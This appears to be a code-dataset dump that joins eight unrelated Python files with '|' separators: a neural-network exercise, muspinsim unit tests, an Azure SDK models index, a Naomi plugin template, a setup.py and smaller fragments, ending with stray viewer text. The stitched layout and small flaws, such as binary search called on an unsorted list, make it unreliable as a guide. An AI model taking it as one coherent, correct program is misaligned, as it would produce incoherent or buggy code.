print(binarySearch([2, 5, 3, 15, 64], 64))
|
import numpy as np
#######################################################
# put `sigmoid_forward` and `sigmoid_grad_input` here #
#######################################################
def sigmoid_forward(x_input):
"""sigmoid nonlinearity
# Arguments
x_input: np.array of size `(n_objects, n_in)`
# Output
the output of relu layer
np.array of size `(n_objects, n_in)`
"""
#################
### YOUR CODE ###
#################
output = []
for x in x_input:
output.append(1/(1+np.exp(-x)))
output = np.asarray(output)
return output
def sigmoid_grad_input(x_input, grad_output):
"""sigmoid nonlinearity gradient.
Calculate the partial derivative of the loss
with respect to the input of the layer
# Arguments
x_input: np.array of size `(n_objects, n_in)`
grad_output: np.array of size `(n_objects, n_in)`
dL / df
# Output
the partial derivative of the loss
with respect to the input of the function
np.array of size `(n_objects, n_in)`
dL / dh
"""
#################
### YOUR CODE ###
#################
output = []
for x in x_input:
one = (1/(1+np.exp(-x)))
two = (np.exp(-x)/(1+np.exp(-x)))
output.append(one*two)
output = np.asarray(output*grad_output)
return output
#######################################################
# put `nll_forward` and `nll_grad_input` here #
#######################################################
def nll_forward(target_pred, target_true):
"""Compute the value of NLL
for a given prediction and the ground truth
# Arguments
target_pred: predictions - np.array of size `(n_objects, 1)`
target_true: ground truth - np.array of size `(n_objects, 1)`
# Output
the value of NLL for a given prediction and the ground truth
scalar
"""
#################
### YOUR CODE ###
#################
n = len(target_pred)
output = -(1/n) * np.sum((target_true*np.log(target_pred))+((1-target_true)*np.log(1-target_pred)))
return output
def nll_grad_input(target_pred, target_true):
"""Compute the partial derivative of NLL
with respect to its input
# Arguments
target_pred: predictions - np.array of size `(n_objects, 1)`
target_true: ground truth - np.array of size `(n_objects, 1)`
# Output
the partial derivative
of NLL with respect to its input
np.array of size `(n_objects, 1)`
"""
#################
### YOUR CODE ###
#################
grad_input = (target_pred - target_true) / (target_pred*(1-target_pred)) * 1/len(target_pred)
return grad_input |
import re
from dataclasses import dataclass
from inspect import isclass
from numbers import Number
from typing import Any, Iterable, Tuple, Type, TypeVar
import numpy as np
from numpy.typing import NDArray
T = TypeVar("T", bound="RecordBase")
_CAMEL_CASE_REGEX: re.Pattern = re.compile(r"([A-Z0-9][a-z0-9]+)")
@dataclass(frozen=True)
class RecordBase:
ID: int
def numeric(self) -> NDArray[np.float64]:
return np.array(
[
self.__dict__[k]
for k, v in self.__dataclass_fields__.items()
if isclass(v.type) and issubclass(v.type, Number) and k != "ID"
],
dtype=np.float64,
)
@classmethod
def new(cls: Type[T], data: Iterable[Iterable[Any]]) -> Tuple[T]:
return tuple(
cls(index, *(e for e in row)) for index, row in enumerate(data)
)
@classmethod
def class_name(cls):
return " ".join(_CAMEL_CASE_REGEX.findall(cls.__qualname__)).lower()
def __len__(self):
return 1
def autoscale(data: NDArray[np.float64]) -> NDArray[np.float64]:
return np.array(
[(column - column.mean()) / column.std() for column in data.T]
).T
def to_numpy_array(data: Tuple[RecordBase]) -> NDArray[np.float64]:
return np.array(
[d.numeric() for d in data],
dtype=np.float64,
)
|
import unittest
import numpy as np
from io import StringIO
from ase.quaternions import Quaternion
from muspinsim.input import MuSpinInput
from muspinsim.simconfig import MuSpinConfig, MuSpinConfigError
class TestConfig(unittest.TestCase):
def test_config(self):
stest = StringIO(
"""
spins
mu 2H e
field
range(1, 11, 2)
temperature
range(0, 10, 2)
time
range(0, 10, 21)
orientation
0 0
0 180
polarization
0 1 1
zeeman 1
1 0 0
dipolar 1 2
0 1 0
hyperfine 1 3
10 2 2
2 10 2
2 2 10
quadrupolar 2
-2 0 0
0 1 0
0 0 1
dissipation 2
0.1
"""
)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate())
self.assertEqual(cfg.name, "muspinsim")
self.assertEqual(len(cfg), 8)
self.assertEqual(cfg.results.shape, (2, 2, 21))
# Try getting one configuration snapshot
cfg0 = cfg[0]
self.assertTrue((cfg0.B == [0, 0, 1]).all())
self.assertEqual(cfg0.T, 0)
self.assertTrue((cfg0.t == np.linspace(0, 10, 21)).all())
self.assertTrue(np.isclose(np.linalg.norm(cfg0.mupol), 1.0))
# Now try recording results
for c in cfg:
res = np.ones(len(c.t))
cfg.store_time_slice(c.id, res)
self.assertTrue((cfg.results == 1).all())
# System checks
self.assertEqual(cfg.system.spins[0], "mu")
self.assertEqual(cfg.system.spins[1], ("H", 2))
self.assertEqual(cfg.system.spins[2], "e")
self.assertEqual(len(cfg.system._terms), 4)
self.assertEqual(cfg._dissip_terms[1], 0.1)
self.assertIn("B", cfg._file_ranges)
self.assertIn("T", cfg._file_ranges)
self.assertIn("t", cfg._x_range)
self.assertIn("orient", cfg._avg_ranges)
# Now try a few errors
stest = StringIO(
"""
spins
mu e
zeeman 3
0 0 1
"""
)
itest = MuSpinInput(stest)
with self.assertRaises(MuSpinConfigError):
cfg = MuSpinConfig(itest.evaluate())
stest = StringIO(
"""
spins
mu e
zeeman 1
2 0
"""
)
itest = MuSpinInput(stest)
with self.assertRaises(MuSpinConfigError):
cfg = MuSpinConfig(itest.evaluate())
stest = StringIO(
"""
y_axis
integral
"""
)
itest = MuSpinInput(stest)
with self.assertRaises(MuSpinConfigError):
cfg = MuSpinConfig(itest.evaluate())
def test_orient(self):
# Some special tests to check how orientations are dealt with
stest = StringIO(
"""
orientation
0 0 0 1.0
0.5*pi 0 0 2.0
"""
)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate())
orange = cfg._avg_ranges["orient"]
self.assertEqual(sum([w for (q, w) in orange]), 2.0)
self.assertTrue(
np.isclose(orange[1][0].q, [2 ** (-0.5), 0, 0, -(2 ** (-0.5))]).all()
)
# Some more complex euler angles combinations
rng = np.linspace(0, np.pi, 4)
angles = np.array(np.meshgrid(*[rng, rng, rng])).reshape((3, -1)).T
ablock = "\n".join(map(lambda x: "\t{0} {1} {2}".format(*x), angles))
stest = StringIO("orientation\n" + ablock)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate())
for ((a, b, c), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
q2 = Quaternion.from_axis_angle([0, 0, 1], c)
q2 *= Quaternion.from_axis_angle([0, 1, 0], b)
q2 *= Quaternion.from_axis_angle([0, 0, 1], a)
q2 = q2.conjugate()
self.assertTrue(np.isclose(q1.q, q2.q).all())
# Same, but for mode zxz
stest = StringIO("orientation zxz\n" + ablock)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate())
for ((a, b, c), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
q2 = Quaternion.from_axis_angle([0, 0, 1], c)
q2 *= Quaternion.from_axis_angle([1, 0, 0], b)
q2 *= Quaternion.from_axis_angle([0, 0, 1], a)
q2 = q2.conjugate()
self.assertTrue(np.isclose(q1.q, q2.q).all())
# Same, but for theta and phi angles alone
angles = np.array(np.meshgrid(*[rng, rng])).reshape((2, -1)).T
ablock = "\n".join(map(lambda x: "\t{0} {1}".format(*x), angles))
stest = StringIO("orientation\n" + ablock)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate())
for ((theta, phi), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
q2 = Quaternion.from_axis_angle([0, 0, 1], phi)
q2 *= Quaternion.from_axis_angle([0, 1, 0], theta)
q2 *= Quaternion.from_axis_angle([0, 0, 1], phi)
q2 = q2.conjugate()
self.assertTrue(np.isclose(q1.q, q2.q).all())
def test_fitting(self):
# Special tests for fitting tasks
stest = StringIO(
"""
fitting_variables
x
fitting_data
0 0.5
1 0.2
"""
)
itest = MuSpinInput(stest)
cfg = MuSpinConfig(itest.evaluate(x=0.0))
# Check that the time axis has been overridden
self.assertTrue((np.array(cfg._x_range["t"]) == [0, 1]).all())
# Should fail due to file_ranges
stest = StringIO(
"""
fitting_variables
x
fitting_data
0 0.5
1 0.2
average_axes
none
orientation
0 0
0 1
"""
)
itest = MuSpinInput(stest)
with self.assertRaises(MuSpinConfigError):
cfg = MuSpinConfig(itest.evaluate(x=0.0))
|
from .study_manager import main
main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .proxy_resource import ProxyResource
from .tracked_resource import TrackedResource
from .server_properties_for_create import ServerPropertiesForCreate
from .server_properties_for_default_create import ServerPropertiesForDefaultCreate
from .server_properties_for_restore import ServerPropertiesForRestore
from .sku import Sku
from .server import Server
from .server_for_create import ServerForCreate
from .server_update_parameters import ServerUpdateParameters
from .firewall_rule import FirewallRule
from .database import Database
from .configuration import Configuration
from .operation_display import OperationDisplay
from .operation import Operation
from .operation_list_result import OperationListResult
from .log_file import LogFile
from .server_paged import ServerPaged
from .firewall_rule_paged import FirewallRulePaged
from .database_paged import DatabasePaged
from .configuration_paged import ConfigurationPaged
from .log_file_paged import LogFilePaged
from .postgre_sql_management_client_enums import (
ServerVersion,
SslEnforcementEnum,
ServerState,
SkuTier,
OperationOrigin,
)
__all__ = [
'ProxyResource',
'TrackedResource',
'ServerPropertiesForCreate',
'ServerPropertiesForDefaultCreate',
'ServerPropertiesForRestore',
'Sku',
'Server',
'ServerForCreate',
'ServerUpdateParameters',
'FirewallRule',
'Database',
'Configuration',
'OperationDisplay',
'Operation',
'OperationListResult',
'LogFile',
'ServerPaged',
'FirewallRulePaged',
'DatabasePaged',
'ConfigurationPaged',
'LogFilePaged',
'ServerVersion',
'SslEnforcementEnum',
'ServerState',
'SkuTier',
'OperationOrigin',
]
|
# -*- coding: utf-8 -*-
from datetime import datetime
from naomi import app_utils
from naomi import plugin
# The Notification Client Plugin contains a method called
# "gather()" that runs every 30 seconds. If the plugin
# does not have a gather() method at the end of the __init__
# method, then it will not be added to the notifier and
# will not run again until Naomi is restarted.
# The base notification client has the following properties:
# self._mic - the current microphone
# self._brain - the current brain
# self.gettext - the current translator
class MyNotificationClient(plugin.NotificationClientPlugin):
# The gather function is fired every 30 seconds
def gather(self, last_date):
if(last_date is None):
self._mic.say("First run")
else:
self._mic.say("Last run at {}".format(last_date))
return datetime.now(tz=app_utils.get_timezone())
|
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="aptbps",
version=1.0,
description="Density-adaptive distance encoding for machine learning on point clouds",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rdimaio/aptbps",
setup_requires=["numpy", "sklearn", "tqdm", "scipy", "KDEpy"],
install_requires=[
"sklearn",
"tqdm",
"numpy",
"scipy",
"KDEpy"
],
author="Riccardo Di Maio",
license="MIT",
keywords="aptbps",
author_email="riccardodimaio11@gmail.com",
packages=["aptbps"]
) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.